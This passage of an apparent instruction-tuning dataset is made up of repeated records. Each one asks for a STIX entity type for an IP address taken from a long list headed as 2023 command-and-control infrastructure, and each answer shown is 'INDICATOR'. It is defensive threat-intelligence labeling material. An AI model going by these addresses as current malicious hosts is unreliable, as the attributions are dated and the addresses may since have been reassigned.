84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n206.189.128.172\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n78.153.139.7\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n134.209.182.221\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n143.244.190.199\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.32.88.90\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 